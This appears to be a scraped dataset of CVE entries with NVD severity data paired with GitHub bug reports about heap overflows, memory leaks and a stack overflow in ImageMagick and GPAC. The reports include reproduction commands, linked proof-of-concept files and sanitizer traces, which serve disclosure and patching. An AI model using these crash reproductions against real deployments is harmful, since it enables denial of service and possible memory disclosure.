`TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: MaximumChannelsExceeded `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ error/tiff.c/ReadTIFFImage/1734. convert: NoImagesDefined `out.bmp' @ error/convert.c/ConvertImageCommand/3322. ================================================================= ==9304==ERROR: LeakSanitizer: detected memory leaks Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6ccc in AcquireCriticalMemory MagickCore/memory.c:634 #3 0x55643e5a3d32 in AcquireQuantumInfo MagickCore/quantum.c:119 #4 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #5 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #6 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #7 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #8 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #9 0x55643deb10fd in MagickMain utilities/magick.c:149 #10 0x55643deb13a8 in main utilities/magick.c:180 #11 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 14922012 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7348 in AcquireVirtualMemory MagickCore/memory.c:746 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 115584 byte(s) in 28 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643dee69c8 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x55643dee6be8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x55643dee7137 in AcquireVirtualMemory MagickCore/memory.c:737 #4 0x55643e5a40b4 in AcquireQuantumPixels MagickCore/quantum.c:177 #5 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #6 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #7 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #8 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #9 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #10 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #11 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #12 0x55643deb10fd in MagickMain utilities/magick.c:149 #13 0x55643deb13a8 in main utilities/magick.c:180 #14 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 224 byte(s) in 1 object(s) allocated from: #0 0x7fedc6aff517 in malloc (/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x55643dee6ca6 in AcquireMagickMemory MagickCore/memory.c:558 #2 0x55643dee6f29 in AcquireQuantumMemory MagickCore/memory.c:676 #3 0x55643e5a3f68 in AcquireQuantumPixels MagickCore/quantum.c:165 #4 0x55643e5a5db5 in SetQuantumDepth MagickCore/quantum.c:699 #5 0x55643e5a6201 in SetQuantumFormat MagickCore/quantum.c:779 #6 0x55643e309bf7 in ReadTIFFImage coders/tiff.c:1676 #7 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #8 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #9 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #10 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #11 0x55643deb10fd in MagickMain utilities/magick.c:149 #12 0x55643deb13a8 in main utilities/magick.c:180 #13 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643df53422 in AcquireSemaphoreMemory MagickCore/semaphore.c:154 #2 0x55643df53523 in AcquireSemaphoreInfo MagickCore/semaphore.c:200 #3 0x55643e5a4cdc in GetQuantumInfo MagickCore/quantum.c:430 #4 0x55643e5a3d82 in AcquireQuantumInfo MagickCore/quantum.c:121 #5 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #6 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #7 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #8 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #9 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #10 0x55643deb10fd in MagickMain utilities/magick.c:149 #11 0x55643deb13a8 in main utilities/magick.c:180 #12 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: 15038036 byte(s) leaked in 59 allocation(s). ``` ## Additional information: ``` $ CC="gcc" CXX="g++" bash ./configure --disable-shared $ make ``` ``` $ export AFL_USE_ASAN=1 AFL_USE_UBSAN=1 $ export AFL_LLVM_CMPLOG=1 $ CC=/usr/local/bin/afl-clang-fast CXX=/usr/local/bin/afl-clang-fast++ bash ./configure --disable-shared $ make ``` ``` Version: ImageMagick 7.0.11-5 Q16 x86_64 2021-03-20 https://imagemagick.org Copyright: (C) 1999-2021 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(5.0) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png tiff x xml zlib ```
AddressSanitizer report LeakSanitizer: detected memory leaks when executing convert command
https://api.github.com/repos/ImageMagick/ImageMagick/issues/3540/comments
11
2021-04-13T14:50:19Z
2022-11-30T17:19:10Z
https://github.com/ImageMagick/ImageMagick/issues/3540
857,040,605
3,540
CVE-2022-0284
2022-08-29T15:15:09.183
A heap-based-buffer-over-read flaw was found in ImageMagick's GetPixelAlpha() function of 'pixel-accessor.h'. This vulnerability is triggered when an attacker passes a specially crafted Tagged Image File Format (TIFF) image to convert it into a PICON file format. This issue can potentially lead to a denial of service and information disclosure.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0284" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045943" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e50f19fd73c792ebe912df8ab83aa51a243a3da7" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4729" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "90A073A6-900F-44EE-B29F-05CB65058078", "versionEndExcluding": "7.1.0-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4729
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-20 ### Operating system Linux ### Operating system, version and so on Linux ubuntu 5.4.0-73-generic #82~18.04.1-Ubuntu SMP Fri Apr 16 15:10:02 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ### Description Hi, ImageMagick security team This is ZhangJiaxing (@r0fm1a) from Codesafe Team of Legendsec at Qi'anxin Group. I've found a Heap Buffer Overflow vulnerability in ImageMagick 7.1.0-20.(github commit ID f54aa4e7ba8a8fb82d200844dc59804f5f6c8cbf in Tue Jan 18 20:00:38 2022 -0500).When someone uses magick to convert a tiff-format image into a picon-format file, the bug will be traggered on. Please feel free to contact me. Regards, ZhangJiaxing ### Steps to Reproduce 1. git clone ImageMagick 2. ./configure CC=gcc CFLAGS="-g -fsanitize=address" && make 3. cd utilities &&./magick convert /path/to/poc.tiff output.picon 4. The Asan logs are as follows: ==46632==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a00000b540 at pc 0x7f7e88ca3257 bp 0x7fffdb9f7370 sp 0x7fffdb9f7360 READ of size 4 at 0x62a00000b540 thread T0 #0 0x7f7e88ca3256 in GetPixelAlpha MagickCore/pixel-accessor.h:59 #1 0x7f7e88ca763e in WritePICONImage coders/xpm.c:807 #2 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #3 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #4 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #5 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #6 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #7 0x55a7a3ebf25a in main utilities/magick.c:182 #8 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #9 0x55a7a3ebe9e9 in _start (/home/r0fm1a/ImageMagick/utilities/.libs/magick+0x19e9) 0x62a00000b540 is located 0 bytes to the right of 21312-byte region [0x62a000006200,0x62a00000b540) allocated by thread T0 here: #0 0x7f7e893e3790 in posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdf790) #1 0x7f7e887d1c99 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x7f7e887d1ea8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x7f7e88582e0e in OpenPixelCache MagickCore/cache.c:3746 #4 0x7f7e8857b296 in GetImagePixelCache MagickCore/cache.c:1776 #5 0x7f7e8858b2de in SyncImagePixelCache MagickCore/cache.c:5516 #6 0x7f7e88798568 in SetImageStorageClass MagickCore/image.c:2626 #7 0x7f7e885ab718 in AcquireImageColormap MagickCore/colormap.c:152 #8 0x7f7e888731cd in SetGrayscaleImage MagickCore/quantize.c:3772 #9 0x7f7e888714e7 in QuantizeImage MagickCore/quantize.c:3118 #10 0x7f7e88866f5d in CompressImageColormap MagickCore/quantize.c:1204 #11 0x7f7e88ca6f6a in WritePICONImage coders/xpm.c:755 #12 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #13 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #14 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #15 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #16 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #17 0x55a7a3ebf25a in main utilities/magick.c:182 #18 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/pixel-accessor.h:59 in GetPixelAlpha Shadow bytes around the buggy address: 0x0c547fff9650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff96a0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c547fff96b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==46632==ABORTING ### Images [magick_heap_bof.zip](https://github.com/ImageMagick/ImageMagick/files/7894812/magick_heap_bof.zip)
Heap Buffer Overflow
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4729/comments
4
2022-01-19T07:07:49Z
2022-02-19T13:35:53Z
https://github.com/ImageMagick/ImageMagick/issues/4729
1,107,736,894
4,729
CVE-2022-1115
2022-08-29T15:15:10.297
A heap-buffer-overflow flaw was found in ImageMagick’s PushShortPixel() function of quantum-private.h file. This vulnerability is triggered when an attacker passes a specially crafted TIFF image file to ImageMagick for conversion, potentially leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1115" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c8718305f120293d8bf13724f12eed885d830b09" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4974" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1f860f52bd8d58737ad883072203391096b30b51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "62ED872E-70D8-4736-9876-F307A77839D4", "versionEndExcluding": "6.9.12-44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A56872F-F8A5-4447-8D18-8DA94072BD22", "versionEndExcluding": "7.1.0-29", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4974
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-28 ### Operating system Linux ### Operating system, version and so on OS: Ubuntu 20.04.3 LTS Version: ImageMagick 7.1.0-28 Q16-HDRI x86_64 2022-03-04 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lzma pangocairo png tiff x xml zlib Compiler: gcc (4.2) ### Description Hello, We found a heap overflow vulnerability in magick ### Steps to Reproduce build it `CC=afl-clang-lto CXX=afl-clang-lto++ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --disable-shared --prefix="/root/fuzz/target/imagemagick/ImageMagick/install"` `AFL_USE_ASAN=1 make -j24 && make install -j24` run it `./magick convert poc /dev/null` output ================================================================= ==1195823==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000181c at pc 0x000000cd5328 bp 0x7ffdacd61fa0 sp 0x7ffdacd61f98 READ of size 1 at 0x61900000181c thread T0 #0 0xcd5327 in PushShortPixel /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h #1 0xcd5327 in ImportRGBAQuantum /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4232:15 #2 0xcd5327 in ImportQuantumPixels /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4780:7 #3 0x13e73f2 in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:2052:24 #4 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #5 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #6 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #7 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #8 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #9 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #10 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x4ce36d in _start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x4ce36d) 0x61900000181c is located 10 bytes to the right of 914-byte region [0x619000001480,0x619000001812) allocated by thread T0 here: #0 0x54ab1d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x54ab1d) #1 0x13e6faf in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:1996:39 #2 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #3 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #4 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #5 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #6 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #7 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #8 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h in PushShortPixel Shadow bytes around the buggy address: 0x0c327fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8300: 00 00 02[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1195823==ABORTING ### Images [poc.zip](https://github.com/ImageMagick/ImageMagick/files/8320342/poc.zip)
heap-buffer-overflow in magick at quantum-private.h PushShortPixel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4974/comments
1
2022-03-22T02:10:38Z
2022-03-24T01:28:05Z
https://github.com/ImageMagick/ImageMagick/issues/4974
1,176,173,021
4,974
CVE-2022-38530
2022-09-06T23:15:09.010
GPAC v2.1-DEV-rev232-gfcaa01ebb-master was discovered to contain a stack overflow when processing ISOM_IOD.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2216" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2216
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info:** ``` root:# MP4Box -version MP4Box - GPAC version 2.1-DEV-rev232-gfcaa01ebb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc:**[poc](https://github.com/0xdd96/PoC/raw/main/gpac/gpac-isom_iod-stack-overflow) **command:** MP4Box -hint -out /dev/null $poc$ Here is the trace reported by ASAN: ``` root:# ./MP4Box -hint -out /dev/null poc [ODF] Error reading descriptor (tag 4 size 14): Invalid MPEG-4 Descriptor [iso file] Unknown box type tra7F in parent moov [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Read Box "esds" (start 5507) failed (Invalid MPEG-4 Descriptor) - skipping [ODF] Not enough bytes (3) to read descriptor (size=93) [ODF] Error reading descriptor (tag 3 size 34): Invalid MPEG-4 Descriptor [iso file] Unknown box type drB3f in parent dinf [iso file] Missing dref box in dinf [iso file] extra box maxr found in hinf, deleting Hinting track ID 1 - Type "mp4v:mp4v" (mpeg4-generic) - BW 1393 kbps Cannot create hinter (Invalid IsoMedia File) Track ID 6 disabled - skipping hint ASAN:DEADLYSIGNAL ================================================================= ==15396==ERROR: AddressSanitizer: stack-overflow on address 0x7fffff7feff8 (pc 0x7ffff6f1b64d bp 0x7ffff75d2320 sp 0x7fffff7ff000 T0) #0 0x7ffff6f1b64c (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) #1 0x7ffff6f1b0e7 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x1030e7) #2 0x7ffff6e40271 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x28271) #3 0x7ffff6ef6b0a in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb0a) #4 0x7ffff1cba647 in gf_malloc utils/alloc.c:150 #5 0x7ffff269f8e6 in gf_odf_new_isom_iod odf/odf_code.c:739 #6 0x7ffff268357e in gf_odf_create_descriptor odf/desc_private.c:77 #7 0x7ffff2684794 in gf_odf_parse_descriptor odf/descriptors.c:88 #8 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #9 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #10 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #11 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #12 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #13 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #14 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #15 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #16 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #17 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #18 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #19 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #20 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #21 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #22 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #23 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #24 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #25 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #26 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #27 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #28 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #29 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #30 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #31 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #32 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #33 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #34 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #35 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #36 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #37 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #38 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #39 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #40 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #41 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #42 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #43 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #44 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #45 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #46 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #47 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #48 0x7ffff2683a29 in gf_odf_read_descriptor odf/desc_private.c:292 #49 0x7ffff2684a45 in gf_odf_parse_descriptor odf/descriptors.c:109 #50 0x7ffff26a0c16 in gf_odf_read_isom_iod odf/odf_code.c:847 #51 0x7ffff2683a29 in 